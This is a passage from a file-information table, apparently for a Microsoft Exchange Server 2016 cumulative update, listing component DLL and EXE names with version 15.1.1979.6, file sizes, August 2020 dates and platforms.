\nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.1.1979.6| 35,712| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.idserialization.dll| 15.1.1979.6| 35,712| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.1.1979.6| 18,312| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.1.1979.6| 18,312| 12-Aug-2020| 20:51| Not applicable \nMicrosoft.exchange.imap4.exe| 15.1.1979.6| 263,048| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.1.1979.6| 263,048| 12-Aug-2020| 20:49| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.1.1979.6| 24,968| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.1.1979.6| 24,968| 12-Aug-2020| 20:49| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.1.1979.6| 53,120| 12-Aug-2020| 20:47| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.1.1979.6| 216,960| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.1.1979.6| 32,128| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.1.1979.6| 281,984| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.1.1979.6| 18,816| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.1.1979.6| 83,848| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.1.1979.6| 94,088| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.1.1979.6| 1,840,512| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.1.1979.6| 71,544| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.1.1979.6| 175,488| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.1.1979.6| 45,952| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.1.1979.6| 159,624| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.1.1979.6| 51,064| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.1.1979.6| 45,952| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.1.1979.6| 30,592| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.1.1979.6| 100,224| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.1.1979.6| 13,184| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.1.1979.6| 271,232| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.killswitch.dll| 15.1.1979.6| 22,400| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.1.1979.6| 33,664| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.1.1979.6| 18,312| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.1.1979.6| 27,520| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.1.1979.6| 30,592| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.1.1979.6| 22,400| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.1.1979.6| 66,432| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.1.1979.6| 29,576| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.1.1979.6| 19,840| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.1.1979.6| 20,360| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.1.1979.6| 19,328| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.1.1979.6| 34,184| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.1.1979.6| 103,808| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.1.1979.6| 31,616| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.1.1979.6| 20,864| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.1.1979.6| 16,256| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.1.1979.6| 49,024| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.1.1979.6| 44,416| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.1.1979.6| 38,280| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.1.1979.6| 10,375,048| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.1.1979.6| 29,064| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.1.1979.6| 21,376| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.1.1979.6| 24,448| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.1.1979.6| 15,232| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.1.1979.6| 21,896| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.1.1979.6| 89,472| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.1.1979.6| 20,872| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.1.1979.6| 26,504| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.1.1979.6| 21,376| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.1.1979.6| 28,032| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.1.1979.6| 28,552| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.1.1979.6| 36,232| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.1.1979.6| 16,768| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.1.1979.6| 19,848| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.1.1979.6| 15,232| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.1.1979.6| 17,280| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.1.1979.6| 19,840| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.1.1979.6| 57,208| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.1.1979.6| 18,824| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.1.1979.6| 16,256| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.1.1979.6| 52,608| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.1.1979.6| 18,304| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.1.1979.6| 34,176| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.1.1979.6| 17,280| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.1.1979.6| 18,824| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.1.1979.6| 43,400| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.loguploader.dll| 15.1.1979.6| 165,240| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.1.1979.6| 54,656| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.1.1979.6| 9,059,720| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.1.1979.6| 33,160| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.1.1979.6| 124,288| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.1.1979.6| 82,824| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.1.1979.6| 14,216| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.1.1979.6| 30,072| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.1.1979.6| 661,376| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.1.1979.6| 63,360| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.1.1979.6| 175,488| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.1.1979.6| 2,784,128| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.1.1979.6| 53,120| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.1.1979.6| 151,936| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.1.1979.6| 966,016| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.1.1979.6| 185,208| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.1.1979.6| 31,624| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.1.1979.6| 39,808| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.1.1979.6| 105,856| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.1.1979.6| 94,584| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.1.1979.6| 43,392| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.1.1979.6| 18,816| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.1979.6| 172,928| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.1979.6| 102,784| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.1979.6| 98,680| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.1979.6| 188,808| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.1979.6| 43,400| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.1979.6| 447,368| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.1979.6| 89,992| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.1979.6| 107,912| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.1979.6| 374,664| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.1979.6| 193,928| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.1979.6| 551,808| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.1979.6| 16,264| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.1979.6| 15,752| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.1979.6| 321,408| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.1979.6| 17,792| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.1979.6| 45,448| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.1979.6| 18,312| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.1979.6| 12,672| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.1979.6| 20,864| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.1979.6| 415,104| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.1979.6| 1,269,632| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.1979.6| 39,288| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.1979.6| 433,032| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.1979.6| 4,560,256| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.1979.6| 260,992| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.1979.6| 33,664| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.1979.6| 94,080| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.1979.6| 591,240| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.1979.6| 3,555,720| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.1979.6| 67,960| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.management.dll| 15.1.1979.6| 16,467,336| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.1979.6| 58,752| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.1979.6| 23,928| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.1979.6| 101,760| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.1979.6| 543,616| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.1979.6| 305,024| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.1979.6| 131,968| 12-Aug-2020| 20:48| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.1979.6| 418,688| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.1979.6| 275,840| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.1979.6| 70,536| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.1979.6| 7,872,896| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.1979.6| 1,500,552| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.1979.6| 145,280| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.1979.6| 13,704| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.1979.6| 71,552| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.1979.6| 1,238,912| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.1979.6| 1,877,384| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.1979.6| 5,225,856| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.1979.6| 36,232| 12-Aug-2020| 20:48| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.1979.6| 117,632| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.1979.6| 207,744| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.1979.6| 79,752| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.1979.6| 17,288| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.1979.6| 156,040| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.1979.6| 65,928| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.1979.6| 30,592| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.1979.6| 58,240| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.1979.6| 29,576| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.1979.6| 175,496| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.1979.6| 28,544| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.1979.6| 75,136| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.1979.6| 207,232| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.1979.6| 440,192| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.1979.6| 83,328| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.1979.6| 35,208| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.1979.6| 53,120| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.1979.6| 96,648| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.migration.dll| 15.1.1979.6| 1,109,896| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.1979.6| 14,728| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.1.1979.6| 135,552| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.1979.6| 5,156,232| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.1979.6| 19,840| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.1979.6| 68,480| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.net.dll| 15.1.1979.6| 5,084,032| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.1979.6| 265,592| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.1979.6| 37,760| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.1979.6| 14,208| 12-Aug-2020| 20:52| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.1979.6| 549,760| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.1979.6| 22,912| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.1979.6| 106,376| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.1979.6| 291,720| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.1979.6| 17,280| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.1979.6| 277,896| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.odata.dll| 15.1.1979.6| 2,992,512| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.1979.6| 88,960| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.1979.6| 101,768| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.1979.6| 38,280| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.1979.6| 45,448| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.1979.6| 58,240| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.1979.6| 147,328| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.1979.6| 26,504| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.1979.6| 184,200| 12-Aug-2020| 20:46| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.1979.6| 26,496| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.1979.6| 38,280| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.1979.6| 55,672| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.1979.6| 147,336| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.1979.6| 191,880| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.1979.6| 33,656| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.1979.6| 28,032| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.1979.6| 32,640| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.1979.6| 15,240| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.1979.6| 17,280| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.1979.6| 17,280| 12-Aug-2020| 20:49| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.1979.6| 106,888| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.1979.6| 106,888| 12-Aug-2020| 20:50| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.1979.6| 24,968| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.1979.6| 24,968| 12-Aug-2020| 20:49| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.1979.6| 42,888| 12-Aug-2020| 20:47| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.1979.6| 264,064| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.1979.6| 264,064| 12-Aug-2020| 20:49| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.1979.6| 358,280| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.1979.6| 4,167,032| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.1979.6| 326,016| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.1979.6| 41,344| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.1979.6| 30,592| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.1979.6| 135,048| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.1979.6| 436,616| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.1979.6| 14,208| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.1979.6| 224,648| 12-Aug-2020| 20:52| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.1979.6| 105,856| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.pst.dll| 15.1.1979.6| 168,840| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.1979.6| 168,840| 12-Aug-2020| 20:47| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.1979.6| 259,464| 12-Aug-2020| 20:48| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.1979.6| 72,072| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.1979.6| 215,944| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.1979.6| 106,880| 12-Aug-2020| 20:50| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.1979.6| 425,864| 12-Aug-2020| 20:47| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.1979.6| 70,536| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.1979.6| 46,464| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.1979.6| 206,208| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.query.core.dll| 15.1.1979.6| 162,688| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.1979.6| 342,400| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.1979.6| 149,376| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.1979.6| 95,104| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.1979.6| 127,368| 12-Aug-2020| 20:51| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.1979.6| 63,360| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.1979.6| 36,736| 12-Aug-2020| 20:50| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.1979.6| 17,800| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.1979.6| 9,666,952| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.1979.6| 20,788,104| 12-Aug-2020| 20:51| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.1979.6| 36,728| 12-Aug-2020| 20:49| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.1979.6| 97,664| 12-Aug-2020| 20:49| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.1979.6| 28,544| 12-Aug-2020| 20:49| 